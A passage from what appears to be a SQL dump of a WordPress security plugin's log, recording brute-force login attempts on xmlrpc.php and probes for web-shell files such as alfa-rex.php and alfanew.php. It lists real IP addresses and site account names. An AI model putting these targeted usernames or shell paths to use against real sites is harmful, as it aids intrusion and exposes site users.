JWtOQE4ANsTkK','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('156.38.151.68',2619774788,'melissa',0,1681151857.6615,152,'Z7KUlvWFzgbN2eA63BwmH1If','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.57.218',1255160282,'melissa',0,1681151859.4778,152,'U2b08EArKNqMPzXDOGS1JZnv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.32.31.163',622862243,'melissa',0,1681151882.5287,152,'WXBZK1hpSUcwfqdItjo3a6Ng','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.98.102.227',2372036323,'techspt',0,1681152191.5726,152,'uG32VKmNzqQFvw06ehZM5jaB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.131',1152553347,'admin',0,1681152267.8095,152,'QJTyRSmv3ja90MoYOHNgZGqu','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.183.144.184',1152880824,'admin',0,1681152275.7990,152,'CtHeRDEZbwJdGfkQVlKaXB6h','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'admin',0,1681152281.1072,152,'h2VUv3w6Drk0L7Y9Gl84FT5R','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('122.114.158.225',2054332129,'phlox',0,1681152283.7949,152,'JCmwg9t8xz2I0fG4MNdsyn5h','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'Admin',0,1681152294.8930,152,'AODXyWKawdS3xmYtQJHBpZcs','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.57.230',2420914662,'Admin',0,1681152296.7121,152,'vf28gYXiDtk3JUaSdCMj65cP','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('111.231.4.211',1877411027,'dermen',0,1681152299.2719,152,'d4jPBJ5Tif0tZcv96NkrQKo8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.242.255.46',804454190,'Admin',0,1681152310.5252,152,'8oXmvdiQ4qhY3A6f2GsERWwL','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.57.230',2420914662,'admin',0,1681152313.0884,152,'MEYU1BCaOA84LqRc7PkGnQtI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.57.230',2420914662,'',0,1681152313.0942,10,'MEYU1BCaOA84LqRc7PkGnQtI','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('103.169.35.181',1739137973,'admin',0,1681152318.9586,152,'16DFt2sMCfqhPElNowceLzBH','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.218.158',1736628894,'admin',0,1681152320.3246,152,'MaOIWJsdP6b1q4we7CYmiGnl','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.200.117.131',3116922243,'techspt',0,1681152953.0006,152,'covqWDf5MzAr8xG4ZBTSUIwH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.69',3583549765,'techspt',0,1681154287.5683,152,'4ZdPfpsQLzkeXmFrt6CD82Hw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.98.101.133',2372035973,'techspt',0,1681155559.6342,152,'ureIAPoDhcCan4F5Mlvp0y3x','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.5',3583549701,'techspt',0,1681155926.0095,152,'nEJzHrNVyifSmB64UPwCag10','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.164',1046910116,'techspt',0,1681156159.1983,152,'BnTAQ7hzfkWyqFCaue0lLVSG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.235.52.36',1156264996,'techspt',0,1681156804.5957,152,'QAoTtfIn6EPaHKyl2eS5cFUq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.254.90.243',1761499891,'techspt',0,1681157604.5635,152,'cCaX0m8S7gDwE1J3uinYfKUx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.187',1046910139,'techspt',0,1681157987.2041,152,'Po7VEULrsgKv6kqjIXRtQOG8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.17.155',1556943259,'globalint',0,1681158045.4678,152,'5iWed7jDh2N0HLsbyORVtpY3','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('210.116.66.47',3530834479,'admin123',0,1681158046.2475,152,'ULwbYCaV7pJWtH9R4G0ZOEqX','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.134.248.211',1535572179,'Admin',0,1681158046.3638,152,'ikmfcTFDY6wHILutrSMxaK9q','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.130.229.130',763553154,'a123456',0,1681158049.4161,152,'idUZoshGvWIef7Snu1QrJpmc','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('39.108.51.67',661402435,'tashi',0,1681158053.7929,152,'Rl5FPhGBeSzJ8cg617OfCwQk','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('95.111.255.131',1601175427,'admin',0,1681158061.2239,152,'PRBZhuNlzrKgLTQxpnVdFbY7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'admin',0,1681158062.1683,152,'2Q6ckJpfavzgdAiKbI48NmLF','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('182.50.151.63',3056768831,'admin',0,1681158063.3289,152,'KlIobvwQmEB9usXOnMWcR3jL','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.98.5.176',3110208944,'admin',0,1681158066.4732,152,'4CjZwS2Bl3t9pkEiLFAxa5yG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('104.37.86.31',1747277343,'admin',0,1681158068.9902,152,'K4xsJOVgR1drHYTtF7lvShBP','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.38.242.51',908522035,'test',0,1681158079.1915,152,'L9BkvxAiVaSEb2u3zXDIn8oF','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('82.102.23.131',1382422403,'techspt',0,1681160117.5797,152,'MWbAYgyrpeBsx7Z06IU1wqi4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'melissa',0,1681160714.3161,152,'LHauRrh2EZdiYC0Oyt4K378A','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.57.218',1255160282,'melissa',0,1681160715.2555,152,'jHpV6dIK0rslEYXBUO5Wb3P4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1681160715.9863,152,'E8gt1SZyQ5pfi2abVxzLK7R4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.101.4.25',778372121,'melissa',0,1681160721.7151,152,'zT20km9soLAuQbpUnZyPdl3B','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1681160728.5065,152,'SboNDWvz5kJRwdE36x98iXqj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.170.43.200',1336552392,'melissa',0,1681160730.2606,152,'2N45KihFoCw0u7HGAkUqbzvJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'melissa',0,1681160738.1138,152,'q6Go9yOBpF4EwHcUQduLTjni','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'melissa',0,1681160746.1044,152,'EdHQrUCjp4uxcBhFyDOP0nAL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'',0,1681160746.1102,10,'EdHQrUCjp4uxcBhFyDOP0nAL','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('37.46.117.90',623801690,'techspt',0,1681161590.4033,152,'dUhBlPJSQ6m7ofOyisnMWLRk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.254.90.235',1761499883,'techspt',0,1681161851.9884,152,'uzMtxUEOjwLgovWBZyKPlkCr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.254.90.235',1761499883,'techspt',0,1681161979.5171,152,'FumyAhjvcGUeIM4pWOkZEb3s','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.254.90.235',1761499883,'',0,1681161979.5222,10,'FumyAhjvcGUeIM4pWOkZEb3s','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('213.152.186.173',3583556269,'techspt',0,1681162965.3137,152,'HaeXpN9PEj7imZlFfycurIDb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.131',1152553347,'admin',0,1681163015.6408,152,'zm2ltXH9P6qEOn8YFvydBa5S','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('129.226.138.214',2179107542,'username',0,1681163021.3951,152,'vGytuc80w9Z3gqTpYS7EO6sJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('104.215.82.71',1758941767,'testtest',0,1681163028.2724,152,'T7d1P6jVKAZhqLgiFyBzRwp4','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.241.137.45',3354495277,'admin',0,1681163031.7530,152,'FyfOqGZlRm2TwPEjK56adoph','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'123456789',0,1681163042.2656,152,'zYtnNIZ5OTKFWfEjyDLwxrko','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('157.245.147.60',2650116924,'hwz',0,1681163044.7394,152,'qiTDx0m4bgVvnea5L9H1RZj8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.57.230',2420914662,'admin',0,1681163044.8766,152,'fD7APTgtm6QEFuVq21GlYiH4','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('3.231.146.243',65508083,'admin',0,1681163054.1440,152,'E80GUAkNMvmL3pfCsiXbdWhI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.54.114.123',3325457019,'1',0,1681163055.6625,152,'brph45XDwzHxaIgUqmFcPBW8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('120.79.227.91',2018501467,'admin',0,1681163061.5219,152,'cVZfp0svaQX2LEK1ebH8FSnI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.183.179.155',1152889755,'melissa',0,1681164076.2625,152,'MR7ApLI348WSgENvFcGKPsDU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.38.151.68',2619774788,'melissa',0,1681164077.2499,152,'nRcjbxetDqT2YO597UaydulG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.205.178.151',1137554071,'melissa',0,1681164077.7451,152,'c6gmHiSy04ZeF2p5GWKjYBou','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.20.253.226',18152930,'melissa',0,1681164082.6299,152,'W6ipTkZF29hEJomlXwLVrPs8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.22',1109230614,'melissa',0,1681164088.3038,152,'Nqb5KSJysu07aCEiUX21B4jk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.130.104.194',763521218,'melissa',0,1681164091.6563,152,'OxTu6VUevkjm48oMXIdN0bWc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1681164093.0865,152,'OIzKQZ3HdpqEJ6Csj87bw4xV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.120.217.243',628677107,'techspt',0,1681164103.5902,152,'qLGfphKIDceE6FXuZkown3Yd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.5',3583549957,'techspt',0,1681165858.1124,152,'0u4h6vefrJYBlgo9zaxDsAtT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('118.193.38.180',1992369844,'',0,1681166338.9395,55,'ROLzWC0Zqij4Ygmrn7M1Ix3v','','19|0|0|0|cmdev-site1.com.corridormediadesign.com/d1/OK.php',0,19,0),('89.238.166.235',1508812523,'techspt',0,1681167022.1492,152,'4EabQT0nHphiK6M5SyzoRvUX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.17.137.52',3356592436,'',0,1681167116.6090,55,'ig9CF7KnLezHM8YuZ4ftpoj6','','19|0|0|0|cmdev-site1.com/wp-content/plugins/seooo/alfanew.php',0,19,0),('162.241.157.186',2733743546,'',0,1681167135.1907,55,'kScAqznZdhj10QXVgWN8GPYK','','19|0|0|0|cmdev-site1.com/admin.php',0,19,0),('14.63.221.211',239066579,'',0,1681167136.0538,55,'7fEVwgrkjLnRZ2DmbN1T0lSh','','19|0|0|0|cmdev-site1.com/wp-content/wp-login.php',0,19,0),('162.241.157.186',2733743546,'',0,1681167137.5807,55,'lh7IafAunE4sMrF31ePQLobN','','19|0|0|0|cmdev-site1.com/alfa-rex.php',0,19,0),('162.241.157.186',2733743546,'',0,1681167137.5832,10,'lh7IafAunE4sMrF31ePQLobN','','707|0|0|0|cmdev-site1.com/alfa-rex.php',0,707,0),('200.17.137.52',3356592436,'',0,1681167137.6602,55,'qmfOFblLuj1yVDiSxHsB5hda','','19|0|0|0|cmdev-site1.com/wp-content/uploads/index.php',0,19,0),('200.17.137.52',3356592436,'',0,1681167137.6622,10,'qmfOFblLuj1yVDiSxHsB5hda','','707|0|0|0|cmdev-site1.com/wp-content/uploads/index.php',0,707,0),('162.241.157.186',2733743546,'',0,1681167207.2276,100,'wV19sS7QCGWMLzmihxJY5gte','','13|0|0|0|cmdev-site1.com/library.php',0,13,0),('200.17.137.52',3356592436,'',0,1681167212.4238,100,'8YbyeJ9UWwRNVsoO5iAPmIEl','','13|0|0|0|cmdev-site1.com/wp-content/themes/finley/alfanew.php',0,13,0),('162.241.157.186',2733743546,'',0,1681167215.9266,100,'LxvyWJficSMkV34e2zpY9Pw0','','13|0|0|0|cmdev-site1.com/alfanew.php',0,13,0),('200.17.137.52',3356592436,'',0,1681167248.8538,100,'vO58EMsnNXcmDYWxPyJoUL6z','','13|0|0|0|cmdev-site1.com/wp-content/uploads/radio.php',0,13,0),('37.59.42.94',624634462,'',0,1681167252.6482,55,'cKfTiNbsazVQBLkdFIUMSe43','','19|0|0|0|cmdev-site1.com/wp-content/plugins/Cache/dropdown.php',0,19,0),('162.241.157.186',2733743546,'',0,1681167325.1885,100,'jnb92MxIVYE1vgJ46HreWSqU','','13|0|0|0|cmdev-site1.com/style.php',0,13,0),('37.59.42.94',624634462,'',0,1681167406.7857,55,'Uv2RsftgaOCZuqI5SH8WdYpr','','19|0|0|0|cmdev-site1.com/wp-content/plugins/Cache/alfa-rex.php',0,19,0),('37.59.42.94',624634462,'',0,1681167406.7875,10,'Uv2RsftgaOCZuqI5SH8WdYpr','','707|0|0|0|cmdev-site1.com/wp-content/plugins/Cache/alfa-rex.php',0,707,0),('37.59.42.94',624634462,'',0,1681167473.4811,100,'jnUtJ4KYMSsBTN8IfwDWFzg1','','13|0|0|0|cmdev-site1.com/wp-content/plugins/seooo/alfa-rex.php',0,13,0),('37.59.42.94',624634462,'',0,1681167627.5633,100,'Rmqv45SVCEZjut0JnAMh6TsI','','13|0|0|0|cmdev-site1.com/wp-content/plugins/Cache/alfanew.php',0,13,0),('5.22.249.133',85391749,'famous',0,1681168137.2547,152,'srD1wHJ0Z4duUtgnXzoj5a8x','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('104.215.82.71',1758941767,'admin',0,1681168137.8497,152,'652VwXUMzT4gDmalFHeWO3BI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('210.116.66.47',3530834479,'test123',0,1681168138.0886,152,'9hjQfCSpyXZkJGwRltreFYML','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('62.171.174.52',1051438644,'admin',0,1681168155.3399,152,'A1G5RWboBHrNZlY0a7QxhJMi','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('66.248.237.41',1123609897,'admin',0,1681168156.5829,152,'AuqyIWRgFOkPmVUbQEeZKxCf','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.198.27.128',3116768128,'admin',0,1681168156.8045,152,'hKQPb6YZDwTGsJNVk1fOpvtu','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('104.37.86.31',1747277343,'demo',0,1681168162.3413,152,'CF465veUSMV3cjP2OgxLT8d9','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.195.105.117',868444533,'tester',0,1681168169.0109,152,'JcrenKDdNhWlYitfO0mjGxwv','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('81.181.130.56',1370849848,'Admin',0,1681168172.5164,152,'b2HcNsphXEd6KzSjUZtO8Mlx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.124.94.44',1736203820,'admin',0,1681168174.8459,152,'d7fLvPMuJhyH2osZGYkb5VgA','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1681168185.4913,152,'VACYg9tIjTvMZqLw0f8cioUN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'melissa',0,1681168189.4039,152,'3A2oOVJgYwUyaBEnQKXCmZs5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.140.29.143',143400335,'melissa',0,1681168192.4395,152,'Gyl0wa8Cbs4ETmSXrDoR1B7F','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.183.225.173',1152901549,'melissa',0,1681168199.3114,152,'QjVIZFNfanMozxewKb1uHBkO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.178.36.28',2947687452,'melissa',0,1681168207.7674,152,'R0LYZMTOil258kxt6KABWgzp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.244.200.74',1056229450,'melissa',0,1681168207.9394,152,'P39JS5sjoVvfK2LO0hqItbyl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.23.226.46',1125638702,'melissa',0,1681168211.6704,152,'y9YnJjNPbwvXIM0iLzqdVmOf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.207.102.163',1540318883,'techspt',0,1681168437.5576,152,'5vK2ipuEU8zcIyOg61bMWdGh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.99',3583550051,'techspt',0,1681169408.4622,152,'v1kAmnZcPSGtdMyRlKUVN8ij','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.185',1046910137,'techspt',0,1681169803.4395,152,'C0fpoat3JVG4HvSNKdUZbxwP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.211',3091979731,'techspt',0,1681170296.5242,152,'dXxqwTm861WP2DySKtgVbnUN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.30.89.67',3223214403,'techspt',0,1681171589.4720,152,'3X5BZEW9LGwa2ebQ0iYPOFgl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.231.91.59',1743215419,'techspt',0,1681171625.0603,152,'BcO7eWp0yFALSzux5QvMZ8KP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.219.176.3',2732306435,'techspt',0,1681174888.1354,152,'rJTg8q2m5kEuDOV0wRidKLWz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.120.132.91',628655195,'techspt',0,1681175153.6206,152,'l1iTbKOv5dBp6M0Dm8xIZnrL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.56.188',3115727036,'melissa',0,1681176143.7115,152,'9xVvGpg35IorbZXwSlKFNUst','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.20',2487390996,'melissa',0,1681176144.0835,152,'A9B4HaPwDUTyogmtk7VnKbOs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.152.79.248',1738035192,'melissa',0,1681176149.9685,152,'HzdouyXIL9NZp8EKqAiJDOBM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.20',2487390996,'melissa',0,1681176159.7483,152,'lpvq8jUdsmJeu4gfQTn0ABcD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.20',2487390996,'',0,1681176159.7510,10,'lpvq8jUdsmJeu4gfQTn0ABcD','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('68.178.145.190',1152553406,'melissa',0,1681176164.8401,152,'ZTfws7mivCpALUVdFlQJuh1x','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.20.253.226',18152930,'melissa',0,1681176167.5288,152,'mh0kWnljOfDKvYC5LFs8Xyri','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.105.97.186',778658234,'melissa',0,1681176168.4228,152,'U46iuQFqLbJytneokfBhsrz1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.238.150.43',1508808235,'techspt',0,1681176190.6005,152,'DkPlAJLhnBvxgIwCWHut6z0j','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('216.128.130.149',3632300693,'admin',0,1681177654.1714,152,'w1FNSlOboYzQ4ML9pg6WTqfj','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'admin',0,1681177663.2658,152,'dynw4GmeLKc0QOJkFBbvfZX7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.77.175.167',760065959,'test',0,1681177664.5944,152,'mV4UE3exqhLju9c8dSFsOXJr','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('122.114.158.225',2054332129,'admin',0,1681177676.2705,152,'YKenPLjQbT3E9pocy4sthUJf','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('62.171.174.52',1051438644,'admin',0,1681177677.2610,152,'NmXPEY2t3CyowrGVOD8IS7fF','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.134.248.211',1535572179,'developer',0,1681177678.8718,152,'FX6USD4Eb80o92BqkNxIeTs1','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.156.174.115',3114053235,'techspt',0,1681178748.5071,152,'fNOMgbH7ndquicDWmP5FrC80','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.215.82.71',1758941767,'Digiology',0,1681178867.3090,152,'wA6C8tRfY0LUQh2gryFZ5cT1','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.3.167',1556939687,'admin',0,1681178875.3277,152,'IsPbBM8Uvr6pylJ9xtOZWGwE','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('43.143.239.49',730853169,'admin',0,1681178876.6490,152,'r4ehLO28gTkQjKRqod79vy1N','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('216.128.130.149',3632300693,'feral',0,1681178897.2871,152,'HUxrGcQIBkiXawATmMyLKCj7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('216.128.130.149',3632300693,'',0,1681178897.2902,10,'HUxrGcQIBkiXawATmMyLKCj7','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('5.161.122.207',94468815,'HelloRDP123',0,1681178899.2961,152,'aTzBDou5MLtqlrYjRW4JXfEy','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.38.197.19',908510483,'alireza',0,1681178909.9827,152,'ZXYlaEAUNb8vwhi3ocQ7t1Of','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1681180307.2507,152,'5LvDfGI7aMyJw8bsORimulg0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('94.237.124.100',1592622180,'melissa',0,1681180307.2523,152,'E9PWZpjSLhoR8DFyb4CAzTim','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.22',1109230614,'melissa',0,1681180380.3573,152,'l2jr0IOP1ystH4bcq3oWGDSu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'admin',0,1681180389.1507,152,'exyYuA4bN8qd2WMUDVc1aiSF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'',0,1681180389.1549,10,'exyYuA4bN8qd2WMUDVc1aiSF','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('207.180.210.110',3484734062,'admin',0,1681180390.3537,152,'UyX3OPjoHnScIdBYMx8fsEKG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'Admin',0,1681180402.1836,152,'eEqPG5d1hwLpu0IZ2OsDbW6m','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.133.215.217',1736824793,'admin',0,1681180406.1549,152,'08V2rBWCe17mogkfcYw3aKO6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('52.139.225.218',881582554,'admin',0,1681180409.3505,152,'DZ3NwcHzeqXu9KdFYijlof6h','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.227.108.223',1088646367,'admin',0,1681180412.2438,152,'uXWAw0iEGtal8KMTmCoL1h5F','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.190',1152553406,'admin',0,1681180414.2115,152,'bMrhq7dJaGOVRK9m2TBCeXZN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.105.97.186',778658234,'admin',0,1681180422.4712,152,'9vnPj7uO6ehGsgx13XAFKw0C','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.15',3583549967,'techspt',0,1681180957.8245,152,'bNFOShcXrjELRgJuq80yxDk1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.15',3583549967,'techspt',0,1681181100.3541,152,'r04I2lna1b9g5ZzK6dU7khje','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.15',3583549967,'',0,1681181100.3596,10,'r04I2lna1b9g5ZzK6dU7khje','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('193.37.254.3',3240492547,'techspt',0,1681181133.2576,152,'RsuOSzgXTAQcyPDB1tNZx3Kh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.10',3583549706,'techspt',0,1681183608.5400,152,'D0xqLhnZEp6kjlKBCuJm8f2t','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('129.226.138.214',2179107542,'artsadd',0,1681184735.8593,152,'9soO0TF48XPrwNSMCvJdtu1E','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.23.62.79',3323412047,'admin',0,1681184737.1473,152,'Y0upXeSqV2GcT5iEIKtOQbA4','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('66.248.237.41',1123609897,'admin',0,1681184737.4777,152,'KeLoFxac0jquNsinRCStb9WU','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.161.122.207',94468815,'admin',0,1681184739.5250,152,'JWAIZsQPUqNEO8mYjCcdeiFp','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'test1',0,1681184747.5414,152,'czSXWAuIEtsrm1aex0qK27Cd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('201.149.91.174',3382008750,'admin',0,1681184747.7749,152,'WyHgSx8qp5iV1TJk0sbBMjLv','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('149.129.53.70',2508272966,'admin',0,1681184758.1192,152,'Cygv3BcWjYz8KJ2Ql4FIMAhV','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.22.249.133',85391749,'admi